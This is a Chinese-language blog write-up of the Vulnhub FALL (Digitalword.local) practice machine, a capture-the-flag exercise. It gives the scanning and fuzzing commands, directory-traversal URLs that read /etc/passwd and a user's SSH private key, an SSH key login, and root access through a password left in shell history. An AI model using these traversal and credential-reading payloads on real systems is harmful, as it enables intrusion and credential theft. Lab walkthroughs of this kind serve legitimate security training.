首页 > 其他分享 >Vulnhub:Digitalword.local (FALL)靶机

Vulnhub:Digitalword.local (FALL)靶机

时间:2023-04-15 14:25:13浏览次数:36  
标签:http .. 192.168 test Vulnhub qiu Digitalword local 111.130

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130

image

访问test.php,提示缺少参数

image

漏洞利用

wfuzz爆破参数

wfuzz -c -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/burp-parameter-names.txt --hc 404 --hh 80 http://192.168.111.130/test.php?FUZZ=../../../../../../../../../../../../../etc/passwd

image

文件包含/etc/passwd,发现用户qiu

http://192.168.111.130/test.php?file=../../../../../../../../../etc/passwd

image

包含qiu用户的私钥

http://192.168.111.130/test.php?file=../../../../../../../../../home/qiu/.ssh/id_rsa

image

使用私钥登录

chmod 400 id_rsa
ssh [email protected] -i id_rsa

image

提权

查看用户qiu家目录下的.bash_history文件,发现密码:remarkablyawesomE

image

用户qiu的sudo权限

image

提升为root

sudo su

image

标签:http,..,192.168,test,Vulnhub,qiu,Digitalword,local,111.130
From: https://www.cnblogs.com/ctostm/p/17321034.html

相关文章

  • 导入 Microsoft Dynamics 365 解决方案时发生 LocalizedNames 错误,元素 savedquery 的
    尝试在Dynamics365中导入解决方案时,会收到以下错误:“无法导入此解决方案包,因为它包含无效的XML。可以尝试使用架构验证错误中找到的信息手动编辑XML内容来修复文件,也可以联系解决方案提供商。错误代码8004801a。如果选择“技术详细信息”,则会看到以下消息以及其他......
  • Maven_How To Add Oracle JDBC Driver In Your Maven Local Repository
    via: http://www.mkyong.com/maven/how-to-add-oracle-jdbc-driver-in-your-maven-local-repository/ DuetoOraclelicenserestriction,thereisNOpublicMavenrepositoryprovidesOracleJDBCdriver.TouseOraclejdbcdrivewithMaven,youhavetoinstallit......
  • 127.0.0.1 & localhost
    localhost也叫local,正确的解释是:本地服务器127.0.0.1在windows等系统的正确解释是:本机地址(本机服务器)localhot(local)是不经网卡传输!这点很重要,它不受网络防火墙和网卡相关的的限制。127.0.0.1是通过网卡传输,依赖网卡,并受到网络防火墙和网卡相关的限制。一般设置程序时......
  • vuex存储和本地存储(localstorage、sessionstorage)的区别
    1.最重要的区别:vuex存储在内存,localstorage则以文件的方式存储在本地2.应用场景:vuex用于组件之间的传值,localstorage则主要用于不同页面之间的传值。3.永久性:当刷新页面时vuex存储的值会丢失,localstorage不会。注:很多朋友觉得用localstorage可以代替vuex,对于不变的数据确实可......
  • Vulnhub Joy Walkthrough
    Recon这台靶机对枚举的要求较高,如果枚举不出有用的信息可能无法进一步展开,我们首先进行普通的扫描。┌──(kali㉿kali)-[~/Labs/Joy/80]└─$sudonmap-sS-sV-p-192.168.80.136StartingNmap7.93(https://nmap.org)at2023-04-1022:42EDTNmapscanreportfor......
  • cookies、sessionStorage与localStorage在Vue中的使用
    目录简介localStorage的使用语法示例sessionStorage的操作语法示例cookie的操作vue-cookie语法示例vue-cookies语法示例js-cookie的使用简介cookies临时存储在客户端中,并且有过期事件,到过期时间会被自动清理。sessionStorage临时存储在客户端中,关闭浏览器后......
  • 学习笔记399—彻底明白ip地址,区分localhost、127.0.0.1和0.0.0.0
    彻底明白ip地址,区分localhost、127.0.0.1和0.0.0.0通俗的了解IP地址是什么对于IP地址,大家并不陌生,特别是在网络访问中我们会经常使用到(平时对域名如百度的www.baidu.com的访问,本质就是对域名所绑定的IP地址的访问),那么IP地址是什么呢?首先,我们要知道网络中的相互访问其实就是在......
  • a note when using docker locally
    whenbuildingthegetting-startedapplicationprovidedbyofficialsite,Igotaerrorsaying, #0138.4node-pre-gypERR!installrequesttohttps://github.com/TryGhost/node-sqlite3/releases/download/v5.1.2/napi-v6-linux-musl-x64.tar.gzfailed,reason:so......
  • git 更新代码错误 Your local changes to the following files would be overwritten
    当gitpull时提示 Yourlocalchangestothefollowingfileswouldbeoverwrittenbymerge idea中撤销当前本地本次提交 ......
  • Vulnhub Development Walkthrough
    VulnhubDevelopmentWalkthroughRecon首先使用netdiscover进行二层Arp扫描。┌──(kali㉿kali)-[~]└─$sudonetdiscover-r192.168.80.0/24Currentlyscanning:Finished!|ScreenView:UniqueHosts5CapturedARPReq/Reppackets,from5hosts.Total......